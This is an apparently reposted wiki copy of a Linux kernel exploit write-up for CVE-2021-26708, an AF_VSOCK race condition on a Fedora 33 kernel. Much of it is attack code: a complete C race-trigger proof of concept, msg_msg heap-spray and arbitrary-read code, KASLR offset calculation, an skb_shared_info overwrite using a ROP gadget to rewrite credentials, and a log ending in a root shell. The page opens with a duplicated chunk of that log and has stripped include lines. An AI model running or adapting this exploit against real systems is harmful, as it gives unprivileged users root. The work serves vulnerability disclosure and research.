[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb

[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
    start at 0x7f0d91120004
    skb_shared_info at 0x7f0d91120ec4
    tx_flags 0x8
    destructor_arg 0xffff9125c42fa100
    callback 0xffffffffab64f6d4
    desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15 

[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30 

[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

==Video==
https://www.youtube.com/watch?v=EC8PFOYOUgU

==Reference==
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html
==Vulnerability==

vsock = socket(AF_VSOCK, SOCK_STREAM, 0);

The creation of AF_VSOCK sockets is available to non-privileged users and does not require user name space.

==Memory corruption==

  setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
                &size, sizeof(unsigned long));

The second thread changes the virtual socket transmission when vsock_stream_etssockopt() tries to acquire the socket lock, by reconnecting the virtual socket:

struct sockaddr_vm addr = {
        .svm_family = AF_VSOCK,
    };

    addr.svm_cid = VMADDR_CID_LOCAL;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

    addr.svm_cid = VMADDR_CID_HYPERVISOR;
    connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

In order to process the connect() of the virtual socket, the kernel executes vsock_stream_connect() which calls vsock_assign_transport(). This function contains the following code:

     if (vsk->transport) {
            if (vsk->transport == new_transport)
                return 0;

            /* transport->release() must be called with sock lock acquired.
             * This path can only be taken during vsock_stream_connect(),
             * where we have already held the sock lock.
             * In the other cases, this function is called on a new socket
             * which is not assigned to any transport.
             */
            vsk->transport->release(vsk);
            vsock_deassign_transport(vsk);
        }

When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:

void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
    struct virtio_vsock_sock *vvs = vsk->trans;

    if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
        *val = VIRTIO_VSOCK_MAX_BUF_SIZE;

    vvs->buf_alloc = *val;

    virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}

==Fuzzing==

The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:

 if (val != vsk->buffer_size &&
      transport && transport->notify_buffer_size)
        transport->notify_buffer_size(vsk, &val);

    vsk->buffer_size = val;

/*
 * AF_VSOCK vulnerability trigger.
 * It's a PoC just for fun.
 * Author: Alexander Popov .
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

#define MAX_RACE_LAG_USEC 50

int vsock = -1;
int tfail = 0;
pthread_barrier_t barrier;

int thread_sync(long lag_nsec)
{
	int ret = -1;
	struct timespec ts0;
	struct timespec ts;
	long delta_nsec = 0;

	ret = pthread_barrier_wait(&barrier);
	if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) {
		perror("[-] pthread_barrier_wait");
		return EXIT_FAILURE;
	}

	ret = clock_gettime(CLOCK_MONOTONIC, &ts0);
	if (ret != 0) {
		perror("[-] clock_gettime");
		return EXIT_FAILURE;
	}

	while (delta_nsec < lag_nsec) {
		ret = clock_gettime(CLOCK_MONOTONIC, &ts);
		if (ret != 0) {
			perror("[-] clock_gettime");
			return EXIT_FAILURE;
		}

		delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 +
						ts.tv_nsec - ts0.tv_nsec;
	}

	return EXIT_SUCCESS;
}

void *th_connect(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct sockaddr_vm addr = {
		.svm_family = AF_VSOCK,
	};

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	addr.svm_cid = VMADDR_CID_LOCAL;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	addr.svm_cid = VMADDR_CID_HYPERVISOR;
	connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm));

	return NULL;
}

void *th_setsockopt(void *arg)
{
	int ret = -1;
	long lag_nsec = *((long *)arg) * 1000;
	struct timespec tp;
	unsigned long size = 0;

	ret = thread_sync(lag_nsec);
	if (ret != EXIT_SUCCESS) {
		tfail++;
		return NULL;
	}

	clock_gettime(CLOCK_MONOTONIC, &tp);
	size = tp.tv_nsec;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE,
						&size, sizeof(unsigned long));

	return NULL;
}

int main(void)
{
	int ret = -1;
	unsigned long size = 0;
	long loop = 0;
	pthread_t th[2] = { 0 };

	vsock = socket(AF_VSOCK, SOCK_STREAM, 0);
	if (vsock == -1)
		err_exit("[-] open vsock");

	printf("[+] AF_VSOCK socket is opened\n");

	size = 1;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE,
						&size, sizeof(unsigned long));
	size = 0xfffffffffffffffdlu;
	setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE,
						&size, sizeof(unsigned long));

	ret = pthread_barrier_init(&barrier, NULL, 2);
	if (ret != 0)
		err_exit("[-] pthread_barrier_init");

	for (loop = 0; loop < 30000; loop++) {
		long tmo1 = 0;
		long tmo2 = loop % MAX_RACE_LAG_USEC;

		printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2);

		ret = pthread_create(&th[0], NULL, th_connect, &tmo1);
		if (ret != 0)
			err_exit("[-] pthread_create #0");

		ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2);
		if (ret != 0)
			err_exit("[-] pthread_create #1");

		ret = pthread_join(th[0], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #0");

		ret = pthread_join(th[1], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join #1");

		if (tfail) {
			printf("[-] some thread got troubles\n");
			exit(EXIT_FAILURE);
		}
	}

	ret = close(vsock);
	if (ret)
		perror("[-] close");

	printf("[+] now see your warnings in the kernel log\n");
	return 0;
}

== The power of four bytes ==

Here I choose Fedora 33 Server as the research target, the kernel version is 5.10.11-200.fc33.x86_64, and I am determined to bypass SMEP and SMAP.

struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};

==Kernel Information Leak==

WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34
...
CPU: 1 PID: 6739 Comm: racer Tainted: G        W         5.10.11-200.fc33.x86_64 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014
RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common]
...
RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80
RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0
RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000
R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008
R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0
FS:  00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0
Call Trace:
  virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common]
  vsock_update_buffer_size+0x5f/0x70 [vsock]
  vsock_stream_setsockopt+0x128/0x270 [vsock]
...

Through gdb debugging, it is found that the RCX register contains the kernel address of the released virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.

==Achieve arbitrary reading==

===From arbitrary free to use-after-free===

![](/static/pwnwiki/img/T01a51dfe7a996e854c.png )

Payload:

    #define PAYLOAD_SZ 40 
    void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
    {
        struct msg_msg *msg_ptr;

        xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;

        /* Don't touch the second part to avoid breaking page fault delivery */
        memset(spray_data, 0xa5, PAGE_SIZE * 4);

        printf("[+] adapt the msg_msg spraying payload:\n");
        msg_ptr = (struct msg_msg *)xattr_addr;
        msg_ptr->m_type = 0x1337;
        msg_ptr->m_ts = ARB_READ_SZ;
        msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
        printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
               msg_ptr,
               msg_ptr->m_type, &(msg_ptr->m_type),
               msg_ptr->m_ts, &(msg_ptr->m_ts),
               msg_ptr->next, &(msg_ptr->next));
    }

But how to use msg_msg to read kernel data? By reading the msgrcv() system call documentation, I found a good solution, using msgrcv() and MSG flags:

MSG_COPY (since Linux 3.8)
        Nondestructively fetch a copy of the message at the ordinal position  in  the  queue
        specified by msgtyp (messages are considered to be numbered starting at 0).

===Steps of arbitrary reading===

![](/static/pwnwiki/img/T01a2a2d47c9494c4a5.png )

![](/static/pwnwiki/img/T0140baae964febb059.png )

Read the contents of the vsock_sock kernel object to user space by receiving messages from the message queue storing the overwritten msg_msg:

ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
                IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

==Find the target of attack==

Here is how the vulnerability extracts these pointers from memory:

#define SK_MEMCG_RD_LOCATION    (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET    840
#define OWNER_CRED_RD_LOCATION    (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET    688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET) 
/*
 * From Linux kernel 5.10.11-200.fc33.x86_64:
 *   function pointer for calculating KASLR secret
 */
#define SOCK_DEF_WRITE_SPACE    0xffffffff819851b0lu 
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;

/* ... */

    sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
            sk_memcg, SK_MEMCG_RD_LOCATION);

    owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
            owner_cred, OWNER_CRED_RD_LOCATION);

    sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
    printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
            sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);

    kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
    printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);

==Implement Use-after-free on sk_buff==

I built the following steps:

1. Use sockets (AF_INET, SOCK_DGRAM, IPPROTO_UDP) to create a client socket and 32 server sockets

2. Prepare a 2800-byte buffer in user space and use 0x42 to memset()

3. Use sendto() to send this buffer from the client socket to each server socket, which is used to create the sk_buff object in kmalloc-4k. Use `sched_setaffinity() on every available CPU

4. Perform arbitrary reading process on vsock_sock

5. Calculate the possible sk_buff kernel address as sk_memcg plus 4096 (the next element of kmalloc-4k)

6. Perform arbitrary reads on this possible sk_buff address

7. If you find 0x42424242424242lu in the location of the network data, find the real sk_buff, and go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6

8. Execute the setxattr()&userfaultfd() heap spray of 32 pthreads on sk_buff and hang them on pthread_barrier

9. Arbitrarily release the sk_buff kernel address

10. Call pthread_barrier_wait(), execute 32 setxattr() to cover the heap spray pthreads of skb_shared_info

11. Use recv() to receive network messages from the server socket.

==Writing freely through skb_shared_info==

The following is a valid payload that overwrites the sk_buff object:

#define SKB_SIZE        4096
#define SKB_SHINFO_OFFSET    3776
#define MY_UINFO_OFFSET        256
#define SKBTX_DEV_ZEROCOPY    (1 << 3) 
void prepare_xattr_vs_skb_spray(void)
{
    struct skb_shared_info *info = NULL;

    xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;

    /* Don't touch the second part to avoid breaking page fault delivery */
    memset(spray_data, 0x0, PAGE_SIZE * 4);

    info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
    info->tx_flags = SKBTX_DEV_ZEROCOPY;
    info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;

    uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);

![](/static/pwnwiki/img/T0185ccbf9f025c74da.png )

Let's talk about the destructor_arg callback:

 /*
     * A single ROP gadget for arbitrary write:
     *   mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
     * Here rdi stores uinfo_p address, rcx is 0, rsi is 1
     */
    uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
    uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
    uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */

Since I couldn't find a gadget that can meet my needs in vmlinuz-5.10.11-200.fc33.x86_64, I researched and constructed it myself.

[a13x@localhost ~]$ ./vsock_pwn

=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================

[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready

[+] stage I: collect good msg_msg locations
[+] go racing, show wins: 
    save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
    save msg_msg ffff9125c25a4640 in msq 12 in slot 1
    save msg_msg ffff9125c25a4780 in msq 22 in slot 2
    save msg_msg ffff9125c3668a40 in msq 78 in slot 3

[+] stage II: arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4d00
    kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins: 

[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000

[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
    kaddr for arb free: ffff9125c25a4640
    kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
    msg_ptr 0x7f0d91120fd8
    m_type 1337 at 0x7f0d91120fe8
    m_ts 6096 at 0x7f0d91120ff0
    msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11 
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb

[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
    start at 0x7f0d91120004
    skb_shared_info at 0x7f0d91120ec4
    tx_flags 0x8
    destructor_arg 0xffff9125c42fa100
    callback 0xffffffffab64f6d4
    desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15 

[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30 

[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

==Video==
https://www.youtube.com/watch?v=EC8PFOYOUgU

==Reference==
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html

文章版权归作者所有，未经允许请勿转载。

THE END